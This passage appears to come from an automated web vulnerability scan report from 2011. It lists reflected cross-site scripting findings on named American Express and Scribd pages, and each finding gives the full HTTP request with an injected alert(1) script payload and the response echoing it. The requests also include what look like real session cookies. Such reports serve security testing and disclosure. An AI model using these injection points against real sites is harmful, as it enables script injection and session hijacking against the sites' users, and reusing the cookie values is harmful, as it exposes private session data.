POST /?cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK=1&410e5'-alert(1)-'714c9e3ae1a=1 HTTP/1.1
Host: www.openforum.com
Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.americanexpress.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://online.americanexpress.com/myca/tpintg/us/action?request_type=un_nucleusLogonDetect&Face=en_US&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum%26SSOCK%3d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAmex=2701895872.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 153865
SSL: True
Expires: Thu, 06 Oct 2011 21:07:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 06 Oct 2011 21:07:49 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: SSOCK=10/6/2011 5:07:49 PM; path=/
Set-Cookie: NucleusAuth=; path=/
Set-Cookie: NucleusAuth_Prospect=; path=/
Set-Cookie: LIVisitorGuid=; path=/
Set-Cookie: SessionKey=; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if IE 7 ]><html class="ie7" xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%25253dinav_home%252526inav%25253dmenu_business_openforum%2526SSOCK%253d1%2526410e5'-alert(1)-'714c9e3ae1a%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%253dinav_home%2526inav%253dmenu_business_openforum%26SSOCK%3d1%26410e5'-alert(1)-'714c9e3ae1a%3d1';
   /*]]>
...[SNIP]...

1.67. http://www.scribd.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bbd6"><script>alert(1)</script>7515f478d03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5bbd6"><script>alert(1)</script>7515f478d03=1 HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; _scribd_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--fc7b6c3069b12443693a170a61dfab07795a4030; __qca=P0-1314780605-1317923807712; grvinsights=172d38ad2d9b9b5aa42030c637b39839; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.6.9.1317923817856; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; __CJ_session_metadata=%22%7B%5C%22active_facebook_session%5C%22%3A%20%5C%22false%5C%22%7D%22

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 06 Oct 2011 17:58:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 680ms
Cache-Control: private,no-cache
Last-Modified: Thu, 06 Oct 2011 17:58:23 GMT
Status: 200 OK
X-Debug: Homepage with no cache
X-Fastcookie: rails
Content-Length: 151514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

xmlns:og="
...[SNIP]...
<link rel="canonical" class="SL_norewrite" href="http://www.scribd.com/?5bbd6"><script>alert(1)</script>7515f478d03=1" />
...[SNIP]...

1.68. http://www.scribd.com/about [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1922"><script>alert(1)</script>9a830630727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about?b1922"><script>alert(1)</script>9a830630727=1 HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.scribd.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; _scribd_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--fc7b6c3069b12443693a170a61dfab07795a4030; __qca=P0-1314780605-1317923807712; grvinsights=172d38ad2d9b9b5aa42030c637b39839; __CJ_session_metadata=%22%7B%5C%22active_facebook_session%5C%22%3A%20%5C%22false%5C%22%7D%22; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.11.7.1317923890123; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 06 Oct 2011 17:58:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
ETag: "c4cde6113c3c6de7fc8b2fdbef66e724"
X-Runtime: 87ms
Cache-Control: private, max-age=0, must-revalidate
Status: 200 OK
X-Served-By: backend
X-Fastcookie: rails
Content-Length: 40744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

xmlns:og="
...[SNIP]...
<link rel="canonical" class="SL_norewrite" href="http://www.scribd.com/about?b1922"><script>alert(1)</script>9a830630727=1" />
...[SNIP]...

1.69. http://www.scribd.com/embeds/37405970/content [start_page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/37405970/content

Issue detail

The value of the start_page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c182c</script><script>alert(1)</script>f9494dd5f8b was submitted in the start_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embeds/37405970/content?view_mode=list&start_page=1c182c</script><script>alert(1)</script>f9494dd5f8b&access_key=key-1l135y5z110uoa6o7t5r& HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.360i.com/services/mobile-marketing.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; _scribd_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--fc7b6c3069b12443693a170a61dfab07795a4030

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 06 Oct 2011 17:57:04 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 45ms
Status: 200 OK
X-Cache: MISS from squid02.local
Via: 1.1 squid02.local:3128 (squid/2.7.STABLE9)
Expires: Thu, 06 Oct 2011 17:57:03 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<script type="text/javascript">window.manager = new Scribd.Embeds.Content({"view_mode":"scroll","document":{"num_pages":87,"title":"360i's Mobile Marketing Playbook","id":37405970},"start_page":"1c182c</script><script>alert(1)</script>f9494dd5f8b","from_jsapi":false,"branded_logo":null,"page_count":87});</script>
...[SNIP]...

1.70. http://www1.amexnetwork.com/destinations [issuerName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.amexnetwork.com
Path:   /destinations

Issue detail

The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0e7c"><script>alert(1)</script>599f285be8c was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /destinations?issuerName=us_amexnetworkdefaulta0e7c"><script>alert(1)</script>599f285be8c HTTP/1.1
Host: www1.amexnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.amexnetwork.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 37098
Cache-Control: no-cache
Expires: Thu, 06 Oct 2011 21:12:48 GMT
Date: Thu, 06 Oct 2011 21:12:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<tit
...[SNIP]...
<option value="http://offers.amexnetwork.com/vgn-ext-templating/v/index.jsp?vgnextoid=fb8f7c82f9e98110VgnVCM2000007cc6410aRCRD&issuerName=us_amexnetworkdefaulta0e7c"><script>alert(1)</script>599f285be8c">
...[SNIP]...

1.71. http://www262.americanexpress.com/business-credit-cards/ [inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www262.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cc6a"%3balert(1)//900ad427800 was submitted in the inav parameter. This input was echoed as 7cc6a";alert(1)//900ad427800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?inav=menu_business_openhome7cc6a"%3balert(1)//900ad427800 HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://home.americanexpress.com/opencom/?inav=menu_business_openhome
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homepage=b; test=test; 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-1315530613634607; ngaopen_JSESSIONID=00001vVMw5jmDBl1iWWl-xanpKP:1525kj48o; bandwidthdetect=vhigh

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 21:06:37 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b; Expires=Thu, 13 Oct 2011 21:06:37 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 82950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>Business Credi
...[SNIP]...
<script type="text/javascript">
        aj_queryString = "inav=menu_business_openhome7cc6a";alert(1)//900ad427800";
   </script>
...[SNIP]...

1.72. http://www262.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www262.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fdf"%3balert(1)//399f8a74f40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2fdf";alert(1)//399f8a74f40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards&c2fdf"%3balert(1)//399f8a74f40=1 HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-1315530613634607; ngaopen_JSESSIONID=00001vVMw5jmDBl1iWWl-xanpKP:1525kj48o

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:45:33 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b; Expires=Thu, 13 Oct 2011 20:45:32 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 83006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>Business Credi
...[SNIP]...
<script type="text/javascript">
        aj_queryString = "inav=menu_cards_sbc_viewallcards&c2fdf";alert(1)//399f8a74f40=1";
   </script>
...[SNIP]...

1.73. http://www262.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www262.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e10"%3balert(1)//a3a2a865af9 was submitted in the view-all-business-cards&inav parameter. This input was echoed as c2e10";alert(1)//a3a2a865af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcardsc2e10"%3balert(1)//a3a2a865af9 HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-1315530613634607; ngaopen_JSESSIONID=00001vVMw5jmDBl1iWWl-xanpKP:1525kj48o

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:45:27 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b; Expires=Thu, 13 Oct 2011 20:45:26 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 82975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>Business Credi
...[SNIP]...
<script type="text/javascript">
        aj_queryString = "inav=menu_cards_sbc_viewallcardsc2e10";alert(1)//a3a2a865af9";
   </script>
...[SNIP]...

1.74. http://www304.americanexpress.com/getthecard/home [sj_tabToOpen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www304.americanexpress.com
Path:   /getthecard/home

Issue detail

The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fabc4%3balert(1)//8e8cff1b484 was submitted in the sj_tabToOpen parameter. This input was echoed as fabc4;alert(1)//8e8cff1b484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getthecard/home?sj_tabToOpen=1fabc4%3balert(1)//8e8cff1b484&inav=menu_cards_pc_choosecard HTTP/1.1
Host: www304.americanexpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.membershiprewards.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-1315530613634607; bandwidthdetect=vhigh; fuel_JSESSIONID=0000-vwoBCwlVhmVMWzzFXrOkJr:15tjsljo5; TrackingId=50.23.123.106-1315530613634607; mbox=check#true#1317935504|session#1317935443061-430884#1317937304

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 21:11:19 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 53984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- conditional comments add classes to html tag for bulletproof version/
...[SNIP]...
<script type="text/javascript">
var sj_responseText="";
var sj_rsvpStatus="";
var sj_offerURL="";
var sj_rsvpAttempts= 0;
var sj_pageContext="Prospect";
var sj_tabToOpen = 1fabc4;alert(1)//8e8cff1b484;
var sj_modalToOpen = "null";
var sj_servername = "www304.americanexpress.com";
</script>
...[SNIP]...

1.75. http://www.scribd.com/about [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /about

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e040'-alert(1)-'80f1fd50ffd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=9e040'-alert(1)-'80f1fd50ffd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; _scribd_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--fc7b6c3069b12443693a170a61dfab07795a4030; __qca=P0-1314780605-1317923807712; grvinsights=172d38ad2d9b9b5aa42030c637b39839; __CJ_session_metadata=%22%7B%5C%22active_facebook_session%5C%22%3A%20%5C%22false%5C%22%7D%22; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.11.7.1317923890123; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 06 Oct 2011 17:58:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
ETag: "6d4036505cd7e6b4b3a8c677029cc4ee"
X-Runtime: 60ms
Cache-Control: private, max-age=0, must-revalidate
